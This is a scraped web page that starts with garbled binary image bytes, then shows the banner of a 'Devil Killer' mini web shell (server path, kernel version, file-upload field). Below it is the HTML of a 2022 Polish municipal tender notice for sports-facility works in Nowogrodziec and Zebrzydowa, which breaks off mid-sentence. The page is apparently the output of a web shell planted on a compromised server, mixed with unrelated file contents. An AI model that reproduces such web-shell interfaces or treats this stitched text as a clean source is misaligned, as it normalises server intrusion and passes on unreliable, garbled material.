JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220428/0013912301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury sportowej w miejscowościach Nowogrodziec i Zebrzydowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nowogrodziec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821581</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowogrodziec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-730</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.jaworska@nowogrodziec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nowogrodziec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury sportowej w miejscowościach Nowogrodziec i Zebrzydowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5c003ef3-c6db-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00139123</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021325/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Modernizacja infrastruktury sportowej w miejscowościach Nowogrodziec i Zebrzydowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.nowogrodziec.pl/3049/modernizacja-infrastruktury-sportowej-w-miejscowosciach-nowogrodziec-i-zebrzydowa-iv-postepowanie-o-udzielenie-zamowienia-publicznego.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu:<br/>1) miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal Adres skrytki ePUAP:/nowogrodziec/skrytka - Wykonawcy korzystają z tych narzędzi głównie w celu<br/>złożenia zaszyfrowanej oferty wraz z wymaganymi załącznikami,<br/>2) poczty elektronicznej - e-mail: a.jaworska@nowogrodziec.pl – komunikacja za pomocą poczty elektronicznej prowadzona będzie<br/>w pozostałym zakresie, innym niż wskazany w pkt. 1). Zamawiający przy użyciu poczty elektronicznej dostarczać będzie wszelkie<br/>informacje, wezwania, zawiadomienia w postępowaniu itp.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP – ze względu na możliwość<br/>wystąpienia różnych problemów technicznych min. z pracą sieci internetowych itp., nie zaleca się przesyłania ofert na ostatnią chwilę<br/>Przekazywanie ofert, wniosków, oświadczeń zawiadomień i innych dokumentów w postępowaniu w innej niż elektroniczna<br/>postaci nie będzie respektowane i nie będzie wywoływać żadnych skutków w niniejszym postępowaniu.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie korespondencja będzie prowadzona wyłącznie z<br/>pełnomocnikiem.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy w ramach systemu ePUAP wynosi 150<br/>MB. W celu załączenia większej ilości dokumentów w jednym załączniku należy podpisać je kwalifikowanym podpisem<br/>elektronicznym, a następnie zaszyfrować je na stronie miniPortalu. Do zaszyfrowania można wybrać pojedyncze pliki, które po<br/>zaszyfrowaniu automatycznie będą miały format .zip. lub .7Z. Można również zaszyfrować cały folder – musi on być skompresowany<br/>do archiwum np. .zip, .7Z.<br/>Ofertę oraz oświadczenia wykonawcy o którym mowa w art. 125 ust 1 oraz w art. 117 ust. 4 Pzp składa się pod rygorem nieważności<br/>w formie elektronicznej ( z kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego rozporządzenia o ochronie danych), dalej<br/>RODO, informuje, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Burmistrz Nowogrodźca, ul. Rynek 1, 59-730 Nowogrodziec.<br/>2) Administrator danych wyznaczył Inspektora Ochrony Danych, z którym można kontaktować się listownie na adres Administratora<br/>lub drogą mailową: iod@nowogrodziec.pl.<br/>3) Administrator będzie przetwarzać Pani/Pana dane na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego w trybie podstawowym pn. Modernizacja infrastruktury sportowej w<br/>miejscowościach Nowogrodziec i Zebrzydowa oraz na podstawie art. 6 ust. 1 lit. a RODO w zakresie udzielonej zgody.<br/>4) Odbiorcami Pani/Pana danych osobowych będą podmioty upoważnione na podstawie przepisów prawa. Ponadto mogą być one<br/>ujawniane podmiotom, z którymi Administrator zawarł umowy na świadczenie usług serwisowych dla systemów informatycznych<br/>wykorzystywanych przy ich przetwarzaniu oraz świadczenia usługi serwera mailowego.<br/>5) Posiada Pani/Pan następujące prawa:<br/>a) prawo dostępu do treści swoich danych – art. 15 RODO;<br/>b) prawo do sprostowania danych – art. 16 RODO;<br/>c) prawo do usunięcia danych – art. 17 RODO;<br/>d) prawo do ograniczenia przetwarzania – art. 18 RODO;<br/>e) prawo do przenoszeni danych – art. 20 RODO;<br/>f) prawo do sprzeciwu – art. 21 RODO.<br/>7) Posiada Pani/Pan ma prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych: Prezes Urzędu Ochrony Danych Osobowych (PUODO); Adres: Stawki 2, 00-193 Warszawa; Telefon: 22 531 03 00.<br/>8) Pani/Pana dane, nie będą przetwarzane w sposób zautomatyzowany w tym również w formie profilowania.<br/>9) Podanie danych osobowych w zakresie wymaganym prawem jest obligatoryjne. Konsekwencją nie podania tych danych będzie<br/>brak możliwości realizacji wniosku, udziału w przetargu lub zawarcia umowy. W pozostałych przypadkach podanie danych jest<br/>dobrowolne a zgoda na ich przetwarzania może zostać cofnięta w dowolnym momencie bez wpływu na zgodność z prawem<br/>przetwarzania, którego dokonano na podstawie zgody sprzed jej cofnięcia (kontakt listowny na adres Administratora bądź na adres<br/>e-mail: iod@nowogrodziec.pl).<br/>10) Pani/Pana dane osobowe będą przechowywane, zgodnie z przepisami ustawy Prawo zamówień publicznych, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy lub okres rękojmi lub gwarancji lub<br/>roszczeń odszkodowawczych itp. przekracza 4 lata, okres przechowywania obejmuje cały ten okres.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenia do korzystania z praw w związku z przepisami ustawy Prawo zamówień<br/>publicznych:<br/>a) w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowania<br/>żądania,<br/>b) wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia określają:<br/>1) projekty budowlane,<br/>2) specyfikacje techniczne wykonania i odbioru robót,<br/>3) przedmiary robót<br/>4) projekt zagospodarowania terenu<br/>5) opis wykonania remontu trybun i balustrad.<br/>Przedmiotem zamówienia jest modernizacja infrastruktury sportowej w miejscowościach Nowogrodziec i Zebrzydowa, w<br/>zakres której wchodzą: modernizacja boiska piłkarskiego w Zebrzydowej wraz z budową systemu zraszania oraz budowa<br/>budynku zaplecza sportowego na stadionie miejskim w Nowogrodźcu przy ul. Słowackiego 1A wraz z infrastrukturą<br/>towarzyszącą.<br/>Miejsce realizacji inwestycji:<br/>1) boisko piłkarskie w Zebrzydowej: dz. nr 581, 582 – obręb 0012 Zebrzydowa;<br/>2) zaplecze sportowe w Nowogrodźcu: dz. nr 557 – obręb 0001 Nowogrodziec-1.<br/>6.3. W ramach przebudowy boiska piłkarskiego w Zebrzydowej wykonane zostaną następujące prace:<br/>1) demontaż dwóch piłkochwytów boiska oraz montaż nowych,<br/>2) demontaż dwóch wiat stadionowych wraz z betonowymi podestami oraz montaż nowych wiat,<br/>3) usunięcie ewentualnych kolizji z instalacjami na terenie działki,<br/>4) niwelacja terenu poprzez wykonanie skarp i osadzenie prefabrykowanych palisad betonowych,<br/>5) przebudowa boiska piłkarskiego,<br/>6) budowa systemu zraszania boiska,<br/>7) wykonanie nawierzchni z kostki betonowej w okolicy wiat dla zawodników rezerwowych,<br/>8) remont trybun wraz z remontem istniejących balustrad przy trybunie dla kibiców,<br/>9) uporządkowanie terenu objętego inwestycją i wysianie trawy na boisku.<br/>Budowa budynku zaplecza sportowego na stadionie miejskim w Nowogrodźcu przy ul. Słowackiego 1A wraz z infrastrukturą towarzyszącą obejmowała będzie wybudowanie nowego obiektu dwukondygnacyjnego pokrytego stropodachem w miejscu istniejącego budynku szatniowego. Budynek na planie prostokąta, o wymiarach zbliżonych do istniejącego. Wybudowana zostanie pochylnia dla osób niepełnosprawnych oraz schody zewnętrzne. Wykonana zostanie nowa wewnętrzna linia zasilająca, nowe przyłącze wodociągowe i kanalizacyjne. Przy budynku odtworzone zostanie utwardzenie terenu oraz dojścia na stadion. Na istniejącym utwardzeniu terenu wydzielone zostaną miejsca parkingowe dla samochodów użytkowników przebywających okresowo, w tym również dla samochodów, z których korzystają osoby niepełnosprawne.<br/>Wykonawca utworzy 2 korytarze komunikacyjne dla uczestników spotkań sportowych na stadionie miejskim w Nowogrodźcu: pierwszy korytarz od strony rzeki, drugi korytarz od strony drogi wojewódzkiej (Zamawiający wskaże dokładną lokalizację).<br/>W trakcie budowy zaplecza sportowego na stadionie miejskim będą odbywały się treningi oraz mecze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45212000-6 - Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych</p> <p class="mb-0">45212210-1 - Roboty budowlane w zakresie jednofunkcyjnych ośrodków sportowych</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryterium „Cena”:<br/>znaczenie kryterium - 60 pkt.<br/>opis sposobu oceny ofert według kryterium „Ceny”:<br/>KC = (Cmin / C) x 100 x 60%<br/>gdzie:<br/>KC - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>Cmin - cena w ofercie z najniższą ceną;<br/>C - cena w ofercie ocenianej;<br/>Ocenie podlega cena brutto wskazana przez Wykonawcę w formularzu oferty.<br/>W przypadku kryterium „Cena” oferta otrzyma, zaokrągloną do dwóch miejsc po przecinku, ilość punktów wynikającą z powyższego<br/>działania.<br/>kryterium „Okres gwarancji jakości”:<br/>znaczenie kryterium – 40 pkt.<br/>opis sposobu oceny ofert dla kryterium „Okres gwarancji jakości”:<br/>KOG = (OG / OGmax) x 100 x 40 %<br/>gdzie:KOG - liczba uzyskanych punktów dla kryterium „Okres gwarancji jakości” ocenianej oferty, zaokrąglona do dwóch miejsc po<br/>przecinku;<br/>OG - okres gwarancji jakości w ofercie ocenianej;<br/>OGmax – maksymalny okres gwarancji jakości wskazany przez Zamawiającego;<br/>Wykonawca podaje okres gwarancji jakości w miesiącach w liczbach całkowitych w formularzu oferty. Okres gwarancji jakości nie<br/>może być krótszy niż 36 miesięcy oraz dłuższy niż 60 miesięcy . W przypadku podania przez Wykonawcę w ofercie okresu gwarancji<br/>jakości dłuższego niż 60 miesięcy do oceny ofert zostanie przyjęty okres gwarancji jakości wynoszący 60 miesięcy. W przypadku<br/>podania przez Wykonawcę w ofercie okresu gwarancji jakości krótszego niż 36 miesięcy, oferta tego Wykonawcy zostanie<br/>odrzucona na podstawie art. 226 ust. 1 pkt 5 Pzp. Okres gwarancji jakości liczony jest od dnia odbioru końcowego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną ubezpieczenia nie mniejszą niż 3 000.000,00 zł.<br/>Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że:<br/>1) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, co najmniej:<br/>a) jedną robotę polegającą na budowie lub przebudowie lub rozbudowie budynku w technologii murowanej wykończonego<br/>„pod klucz” o kubaturze min 1000m3 (z wyłączeniem hal przemysłowych, hal magazynowych) o wartości nie mniejszej niż 1<br/>500.000,00 złotych brutto,<br/>b) jedną robotę polegającą na budowie naturalnego boiska lub przebudowie boiska naturalnego o wartości nie mniejszej niż<br/>250 000,00zł brutto.<br/>2) dysponuje następującymi osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnymi za kierowanie robotami budowlanymi tj.:<br/>a) kierownik budowy (minimalne wymagania): uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>konstrukcyjno – budowlanej bez ograniczeń uniemożliwiających pełnienie funkcji kierownika budowy przy realizacji przedmiotu zamówienia;<br/>b) kierownik robót elektrycznych (minimalne wymagania): uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń uniemożliwiających pełnienie<br/>funkcji kierownika robót przy realizacji przedmiotu zamówienia;<br/>c) kierownik robót sanitarnych (minimalne wymagania): uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych<br/>bez ograniczeń uniemożliwiających pełnienie funkcji kierownika robót przy realizacji przedmiotu zamówienia.<br/>Zamawiający dopuszcza pełnienie funkcji kierownika robót przez jedną osobę pod warunkiem spełnienia wymagań<br/>opisanych powyżej.<br/>W przypadku wykonawców składających wspólnie ofertę Zamawiający uzna za spełnienie warunku udziału dotyczącego<br/>zdolności technicznej lub zawodowej potwierdzenie spełnienia obydwu ww. warunków przez jednego z wykonawców<br/>wspólnie składających ofertę lub łącznie przez wykonawców wspólnie składających ofertę. Zamawiający nie dopuszcza<br/>możliwości łączenia doświadczenia różnych wykonawców w celu potwierdzenia spełnienia warunku określonego w 